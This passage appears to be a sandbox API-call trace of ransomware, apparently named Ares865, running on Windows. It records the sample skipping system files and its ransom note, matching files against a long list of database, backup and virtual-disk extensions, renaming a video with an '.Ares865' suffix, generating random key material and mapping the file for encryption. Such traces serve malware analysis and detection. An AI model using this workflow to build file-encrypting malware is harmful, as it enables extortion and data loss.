(lpString1="5757_10vS5HYp.mkv", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2="aoldtz.exe") returned -1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2=".") returned 1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2="..") returned 1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2="windows") returned -1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2="bootmgr") returned -1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2="temp") returned -1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2="pagefile.sys") returned -1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2="boot") returned -1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2="ids.txt") returned -1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2="ntuser.dat") returned -1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2="perflogs") returned -1 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2="MSBuild") returned -1 [0092.003] lstrlenW (lpString="5757_10vS5HYp.mkv") returned 17 [0092.003] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz\\*") returned 75 [0092.003] lstrcpyW (in: lpString1=0x2cce494, lpString2="5757_10vS5HYp.mkv" | out: lpString1="5757_10vS5HYp.mkv") returned="5757_10vS5HYp.mkv" [0092.003] lstrlenW (lpString="5757_10vS5HYp.mkv") returned 17 [0092.003] lstrlenW (lpString="Ares865") returned 7 [0092.003] lstrcmpiW (lpString1="HYp.mkv", lpString2="Ares865") returned 1 [0092.003] lstrlenW (lpString=".dll") returned 4 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2=".dll") returned 1 [0092.003] lstrlenW (lpString=".lnk") returned 4 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2=".lnk") returned 1 [0092.003] lstrlenW (lpString=".ini") returned 4 [0092.003] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2=".ini") returned 1 [0092.004] lstrlenW (lpString=".sys") returned 4 [0092.004] lstrcmpiW (lpString1="5757_10vS5HYp.mkv", lpString2=".sys") returned 1 [0092.004] lstrlenW (lpString="5757_10vS5HYp.mkv") returned 17 [0092.004] lstrlenW (lpString="bak") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="bak") returned 1 [0092.004] lstrlenW (lpString="ba_") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="ba_") returned 1 [0092.004] lstrlenW (lpString="dbb") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="dbb") returned 1 [0092.004] lstrlenW (lpString="vmdk") returned 4 [0092.004] lstrcmpiW (lpString1=".mkv", lpString2="vmdk") returned -1 [0092.004] lstrlenW (lpString="rar") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="rar") returned -1 [0092.004] lstrlenW (lpString="zip") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="zip") returned -1 [0092.004] lstrlenW (lpString="tgz") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="tgz") returned -1 [0092.004] lstrlenW (lpString="vbox") returned 4 [0092.004] lstrcmpiW (lpString1=".mkv", lpString2="vbox") returned -1 [0092.004] lstrlenW (lpString="vdi") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="vdi") returned -1 [0092.004] lstrlenW (lpString="vhd") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="vhd") returned -1 [0092.004] lstrlenW (lpString="vhdx") returned 4 [0092.004] lstrcmpiW (lpString1=".mkv", lpString2="vhdx") returned -1 [0092.004] lstrlenW (lpString="avhd") returned 4 [0092.004] lstrcmpiW (lpString1=".mkv", lpString2="avhd") returned -1 [0092.004] lstrlenW (lpString="db") returned 2 [0092.004] lstrcmpiW (lpString1="kv", lpString2="db") returned 1 [0092.004] lstrlenW (lpString="db2") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="db2") returned 1 [0092.004] lstrlenW (lpString="db3") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="db3") returned 1 [0092.004] lstrlenW (lpString="dbf") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="dbf") returned 1 [0092.004] lstrlenW (lpString="mdf") returned 3 [0092.004] lstrcmpiW (lpString1="mkv", lpString2="mdf") returned 1 [0092.005] lstrlenW (lpString="mdb") returned 3 [0092.005] lstrcmpiW (lpString1="mkv", lpString2="mdb") returned 1 [0092.005] lstrlenW (lpString="sql") returned 3 [0092.005] lstrcmpiW (lpString1="mkv", lpString2="sql") returned -1 [0092.005] lstrlenW (lpString="sqlite") returned 6 [0092.005] lstrcmpiW (lpString1="Yp.mkv", lpString2="sqlite") returned 1 [0092.005] lstrlenW (lpString="sqlite3") returned 7 [0092.005] lstrcmpiW (lpString1="HYp.mkv", lpString2="sqlite3") returned -1 [0092.005] lstrlenW (lpString="sqlitedb") returned 8 [0092.005] lstrcmpiW (lpString1="5HYp.mkv", lpString2="sqlitedb") returned -1 [0092.005] lstrlenW (lpString="xml") returned 3 [0092.005] lstrcmpiW (lpString1="mkv", lpString2="xml") returned -1 [0092.005] lstrlenW (lpString="$er") returned 3 [0092.005] lstrcmpiW (lpString1="mkv", lpString2="$er") returned 1 [0092.005] lstrlenW (lpString="4dd") returned 3 [0092.005] lstrcmpiW (lpString1="mkv", lpString2="4dd") returned 1 [0092.005] lstrlenW (lpString="4dl") returned 3 [0092.005] lstrcmpiW (lpString1="mkv", lpString2="4dl") returned 1 [0092.005] lstrlenW (lpString="^^^") returned 3 [0092.005] lstrcmpiW (lpString1="mkv", lpString2="^^^") returned 1 [0092.005] lstrlenW (lpString="abs") returned 3 [0092.005] lstrcmpiW (lpString1="mkv", lpString2="abs") returned 1 [0092.005] lstrlenW (lpString="abx") returned 3 [0092.005] lstrcmpiW (lpString1="mkv", lpString2="abx") returned 1 [0092.005] lstrlenW (lpString="accdb") returned 5 [0092.005] lstrcmpiW (lpString1="p.mkv", lpString2="accdb") returned 1 [0092.005] lstrlenW (lpString="accdc") returned 5 [0092.005] lstrcmpiW (lpString1="p.mkv", lpString2="accdc") returned 1 [0092.005] lstrlenW (lpString="accde") returned 5 [0092.005] lstrcmpiW (lpString1="p.mkv", lpString2="accde") returned 1 [0092.005] lstrlenW (lpString="accdr") returned 5 [0092.005] lstrcmpiW (lpString1="p.mkv", lpString2="accdr") returned 1 [0092.005] lstrlenW (lpString="accdt") returned 5 [0092.005] lstrcmpiW (lpString1="p.mkv", lpString2="accdt") returned 1 [0092.005] lstrlenW (lpString="accdw") returned 5 [0092.005] lstrcmpiW (lpString1="p.mkv", lpString2="accdw") returned 1 [0092.005] lstrlenW (lpString="accft") returned 5 [0092.005] lstrcmpiW (lpString1="p.mkv", lpString2="accft") returned 1 [0092.006] lstrlenW (lpString="adb") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="adb") returned 1 [0092.006] lstrlenW (lpString="adb") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="adb") returned 1 [0092.006] lstrlenW (lpString="ade") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="ade") returned 1 [0092.006] lstrlenW (lpString="adf") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="adf") returned 1 [0092.006] lstrlenW (lpString="adn") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="adn") returned 1 [0092.006] lstrlenW (lpString="adp") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="adp") returned 1 [0092.006] lstrlenW (lpString="alf") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="alf") returned 1 [0092.006] lstrlenW (lpString="ask") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="ask") returned 1 [0092.006] lstrlenW (lpString="btr") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="btr") returned 1 [0092.006] lstrlenW (lpString="cat") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="cat") returned 1 [0092.006] lstrlenW (lpString="cdb") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="cdb") returned 1 [0092.006] lstrlenW (lpString="ckp") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="ckp") returned 1 [0092.006] lstrlenW (lpString="cma") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="cma") returned 1 [0092.006] lstrlenW (lpString="cpd") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="cpd") returned 1 [0092.006] lstrlenW (lpString="dacpac") returned 6 [0092.006] lstrcmpiW (lpString1="Yp.mkv", lpString2="dacpac") returned 1 [0092.006] lstrlenW (lpString="dad") returned 3 [0092.006] lstrcmpiW (lpString1="mkv", lpString2="dad") returned 1 [0092.006] lstrlenW (lpString="dadiagrams") returned 10 [0092.006] lstrcmpiW (lpString1="vS5HYp.mkv", lpString2="dadiagrams") returned 1 [0092.006] lstrlenW (lpString="daschema") returned 8 [0092.006] lstrcmpiW (lpString1="5HYp.mkv", lpString2="daschema") returned -1 [0092.006] lstrlenW (lpString="db-journal") returned 10 [0092.007] lstrcmpiW (lpString1="vS5HYp.mkv", lpString2="db-journal") returned 1 [0092.007] lstrlenW (lpString="db-shm") returned 6 [0092.007] lstrcmpiW (lpString1="Yp.mkv", lpString2="db-shm") returned 1 [0092.007] lstrlenW (lpString="db-wal") returned 6 [0092.007] lstrcmpiW (lpString1="Yp.mkv", lpString2="db-wal") returned 1 [0092.007] lstrlenW (lpString="dbc") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dbc") returned 1 [0092.007] lstrlenW (lpString="dbs") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dbs") returned 1 [0092.007] lstrlenW (lpString="dbt") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dbt") returned 1 [0092.007] lstrlenW (lpString="dbv") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dbv") returned 1 [0092.007] lstrlenW (lpString="dbx") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dbx") returned 1 [0092.007] lstrlenW (lpString="dcb") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dcb") returned 1 [0092.007] lstrlenW (lpString="dct") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dct") returned 1 [0092.007] lstrlenW (lpString="dcx") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dcx") returned 1 [0092.007] lstrlenW (lpString="ddl") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="ddl") returned 1 [0092.007] lstrlenW (lpString="dlis") returned 4 [0092.007] lstrcmpiW (lpString1=".mkv", lpString2="dlis") returned -1 [0092.007] lstrlenW (lpString="dp1") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dp1") returned 1 [0092.007] lstrlenW (lpString="dqy") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dqy") returned 1 [0092.007] lstrlenW (lpString="dsk") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dsk") returned 1 [0092.007] lstrlenW (lpString="dsn") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dsn") returned 1 [0092.007] lstrlenW (lpString="dtsx") returned 4 [0092.007] lstrcmpiW (lpString1=".mkv", lpString2="dtsx") returned -1 [0092.007] lstrlenW (lpString="dxl") returned 3 [0092.007] lstrcmpiW (lpString1="mkv", lpString2="dxl") returned 1 [0092.008] lstrlenW (lpString="eco") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="eco") returned 1 [0092.008] lstrlenW (lpString="ecx") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="ecx") returned 1 [0092.008] lstrlenW (lpString="edb") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="edb") returned 1 [0092.008] lstrlenW (lpString="epim") returned 4 [0092.008] lstrcmpiW (lpString1=".mkv", lpString2="epim") returned -1 [0092.008] lstrlenW (lpString="fcd") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="fcd") returned 1 [0092.008] lstrlenW (lpString="fdb") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="fdb") returned 1 [0092.008] lstrlenW (lpString="fic") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="fic") returned 1 [0092.008] lstrlenW (lpString="flexolibrary") returned 12 [0092.008] lstrcmpiW (lpString1="10vS5HYp.mkv", lpString2="flexolibrary") returned -1 [0092.008] lstrlenW (lpString="fm5") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="fm5") returned 1 [0092.008] lstrlenW (lpString="fmp") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="fmp") returned 1 [0092.008] lstrlenW (lpString="fmp12") returned 5 [0092.008] lstrcmpiW (lpString1="p.mkv", lpString2="fmp12") returned 1 [0092.008] lstrlenW (lpString="fmpsl") returned 5 [0092.008] lstrcmpiW (lpString1="p.mkv", lpString2="fmpsl") returned 1 [0092.008] lstrlenW (lpString="fol") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="fol") returned 1 [0092.008] lstrlenW (lpString="fp3") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="fp3") returned 1 [0092.008] lstrlenW (lpString="fp4") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="fp4") returned 1 [0092.008] lstrlenW (lpString="fp5") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="fp5") returned 1 [0092.008] lstrlenW (lpString="fp7") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="fp7") returned 1 [0092.008] lstrlenW (lpString="fpt") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="fpt") returned 1 [0092.008] lstrlenW (lpString="frm") returned 3 [0092.008] lstrcmpiW (lpString1="mkv", lpString2="frm") returned 1 [0092.009] lstrlenW (lpString="gdb") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="gdb") returned 1 [0092.009] lstrlenW (lpString="gdb") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="gdb") returned 1 [0092.009] lstrlenW (lpString="grdb") returned 4 [0092.009] lstrcmpiW (lpString1=".mkv", lpString2="grdb") returned -1 [0092.009] lstrlenW (lpString="gwi") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="gwi") returned 1 [0092.009] lstrlenW (lpString="hdb") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="hdb") returned 1 [0092.009] lstrlenW (lpString="his") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="his") returned 1 [0092.009] lstrlenW (lpString="ib") returned 2 [0092.009] lstrcmpiW (lpString1="kv", lpString2="ib") returned 1 [0092.009] lstrlenW (lpString="idb") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="idb") returned 1 [0092.009] lstrlenW (lpString="ihx") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="ihx") returned 1 [0092.009] lstrlenW (lpString="itdb") returned 4 [0092.009] lstrcmpiW (lpString1=".mkv", lpString2="itdb") returned -1 [0092.009] lstrlenW (lpString="itw") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="itw") returned 1 [0092.009] lstrlenW (lpString="jet") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="jet") returned 1 [0092.009] lstrlenW (lpString="jtx") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="jtx") returned 1 [0092.009] lstrlenW (lpString="kdb") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="kdb") returned 1 [0092.009] lstrlenW (lpString="kexi") returned 4 [0092.009] lstrcmpiW (lpString1=".mkv", lpString2="kexi") returned -1 [0092.009] lstrlenW (lpString="kexic") returned 5 [0092.009] lstrcmpiW (lpString1="p.mkv", lpString2="kexic") returned 1 [0092.009] lstrlenW (lpString="kexis") returned 5 [0092.009] lstrcmpiW (lpString1="p.mkv", lpString2="kexis") returned 1 [0092.009] lstrlenW (lpString="lgc") returned 3 [0092.009] lstrcmpiW (lpString1="mkv", lpString2="lgc") returned 1 [0092.009] lstrlenW (lpString="lwx") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="lwx") returned 1 [0092.010] lstrlenW (lpString="maf") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="maf") returned 1 [0092.010] lstrlenW (lpString="maq") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="maq") returned 1 [0092.010] lstrlenW (lpString="mar") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="mar") returned 1 [0092.010] lstrlenW (lpString="marshal") returned 7 [0092.010] lstrcmpiW (lpString1="HYp.mkv", lpString2="marshal") returned -1 [0092.010] lstrlenW (lpString="mas") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="mas") returned 1 [0092.010] lstrlenW (lpString="mav") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="mav") returned 1 [0092.010] lstrlenW (lpString="maw") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="maw") returned 1 [0092.010] lstrlenW (lpString="mdbhtml") returned 7 [0092.010] lstrcmpiW (lpString1="HYp.mkv", lpString2="mdbhtml") returned -1 [0092.010] lstrlenW (lpString="mdn") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="mdn") returned 1 [0092.010] lstrlenW (lpString="mdt") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="mdt") returned 1 [0092.010] lstrlenW (lpString="mfd") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="mfd") returned 1 [0092.010] lstrlenW (lpString="mpd") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="mpd") returned -1 [0092.010] lstrlenW (lpString="mrg") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="mrg") returned -1 [0092.010] lstrlenW (lpString="mud") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="mud") returned -1 [0092.010] lstrlenW (lpString="mwb") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="mwb") returned -1 [0092.010] lstrlenW (lpString="myd") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="myd") returned -1 [0092.010] lstrlenW (lpString="ndf") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="ndf") returned -1 [0092.010] lstrlenW (lpString="nnt") returned 3 [0092.010] lstrcmpiW (lpString1="mkv", lpString2="nnt") returned -1 [0092.011] lstrlenW (lpString="nrmlib") returned 6 [0092.011] lstrcmpiW (lpString1="Yp.mkv", lpString2="nrmlib") returned 1 [0092.011] lstrlenW (lpString="ns2") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="ns2") returned -1 [0092.011] lstrlenW (lpString="ns3") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="ns3") returned -1 [0092.011] lstrlenW (lpString="ns4") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="ns4") returned -1 [0092.011] lstrlenW (lpString="nsf") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="nsf") returned -1 [0092.011] lstrlenW (lpString="nv") returned 2 [0092.011] lstrcmpiW (lpString1="kv", lpString2="nv") returned -1 [0092.011] lstrlenW (lpString="nv2") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="nv2") returned -1 [0092.011] lstrlenW (lpString="nwdb") returned 4 [0092.011] lstrcmpiW (lpString1=".mkv", lpString2="nwdb") returned -1 [0092.011] lstrlenW (lpString="nyf") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="nyf") returned -1 [0092.011] lstrlenW (lpString="odb") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="odb") returned -1 [0092.011] lstrlenW (lpString="odb") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="odb") returned -1 [0092.011] lstrlenW (lpString="oqy") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="oqy") returned -1 [0092.011] lstrlenW (lpString="ora") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="ora") returned -1 [0092.011] lstrlenW (lpString="orx") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="orx") returned -1 [0092.011] lstrlenW (lpString="owc") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="owc") returned -1 [0092.011] lstrlenW (lpString="p96") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="p96") returned -1 [0092.011] lstrlenW (lpString="p97") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="p97") returned -1 [0092.011] lstrlenW (lpString="pan") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="pan") returned -1 [0092.011] lstrlenW (lpString="pdb") returned 3 [0092.011] lstrcmpiW (lpString1="mkv", lpString2="pdb") returned -1 [0092.012] lstrlenW (lpString="pdm") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="pdm") returned -1 [0092.012] lstrlenW (lpString="pnz") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="pnz") returned -1 [0092.012] lstrlenW (lpString="qry") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="qry") returned -1 [0092.012] lstrlenW (lpString="qvd") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="qvd") returned -1 [0092.012] lstrlenW (lpString="rbf") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="rbf") returned -1 [0092.012] lstrlenW (lpString="rctd") returned 4 [0092.012] lstrcmpiW (lpString1=".mkv", lpString2="rctd") returned -1 [0092.012] lstrlenW (lpString="rod") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="rod") returned -1 [0092.012] lstrlenW (lpString="rodx") returned 4 [0092.012] lstrcmpiW (lpString1=".mkv", lpString2="rodx") returned -1 [0092.012] lstrlenW (lpString="rpd") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="rpd") returned -1 [0092.012] lstrlenW (lpString="rsd") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="rsd") returned -1 [0092.012] lstrlenW (lpString="sas7bdat") returned 8 [0092.012] lstrcmpiW (lpString1="5HYp.mkv", lpString2="sas7bdat") returned -1 [0092.012] lstrlenW (lpString="sbf") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="sbf") returned -1 [0092.012] lstrlenW (lpString="scx") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="scx") returned -1 [0092.012] lstrlenW (lpString="sdb") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="sdb") returned -1 [0092.012] lstrlenW (lpString="sdc") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="sdc") returned -1 [0092.012] lstrlenW (lpString="sdf") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="sdf") returned -1 [0092.012] lstrlenW (lpString="sis") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="sis") returned -1 [0092.012] lstrlenW (lpString="spq") returned 3 [0092.012] lstrcmpiW (lpString1="mkv", lpString2="spq") returned -1 [0092.012] lstrlenW (lpString="te") returned 2 [0092.013] lstrcmpiW (lpString1="kv", lpString2="te") returned -1 [0092.013] lstrlenW (lpString="teacher") returned 7 [0092.013] lstrcmpiW (lpString1="HYp.mkv", lpString2="teacher") returned -1 [0092.013] lstrlenW (lpString="tmd") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="tmd") returned -1 [0092.013] lstrlenW (lpString="tps") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="tps") returned -1 [0092.013] lstrlenW (lpString="trc") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="trc") returned -1 [0092.013] lstrlenW (lpString="trc") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="trc") returned -1 [0092.013] lstrlenW (lpString="trm") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="trm") returned -1 [0092.013] lstrlenW (lpString="udb") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="udb") returned -1 [0092.013] lstrlenW (lpString="udl") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="udl") returned -1 [0092.013] lstrlenW (lpString="usr") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="usr") returned -1 [0092.013] lstrlenW (lpString="v12") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="v12") returned -1 [0092.013] lstrlenW (lpString="vis") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="vis") returned -1 [0092.013] lstrlenW (lpString="vpd") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="vpd") returned -1 [0092.013] lstrlenW (lpString="vvv") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="vvv") returned -1 [0092.013] lstrlenW (lpString="wdb") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="wdb") returned -1 [0092.013] lstrlenW (lpString="wmdb") returned 4 [0092.013] lstrcmpiW (lpString1=".mkv", lpString2="wmdb") returned -1 [0092.013] lstrlenW (lpString="wrk") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="wrk") returned -1 [0092.013] lstrlenW (lpString="xdb") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="xdb") returned -1 [0092.013] lstrlenW (lpString="xld") returned 3 [0092.013] lstrcmpiW (lpString1="mkv", lpString2="xld") returned -1 [0092.013] lstrlenW (lpString="xmlff") returned 5 [0092.014] lstrcmpiW (lpString1="p.mkv", lpString2="xmlff") returned -1 [0092.014] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz\\5757_10vS5HYp.mkv.Ares865") returned 99 [0092.014] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz\\5757_10vS5HYp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\andco4sgwz\\5757_10vs5hyp.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz\\5757_10vS5HYp.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\andco4sgwz\\5757_10vs5hyp.mkv.ares865"), dwFlags=0x1) returned 1 [0092.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz\\5757_10vS5HYp.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\andco4sgwz\\5757_10vs5hyp.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.014] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27857) returned 1 [0092.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.015] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.015] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.015] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.015] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.015] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.016] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6fe0, lpName=0x0) returned 0x15c [0092.016] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6fe0) returned 0x190000 [0092.017] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.017] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.017] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, 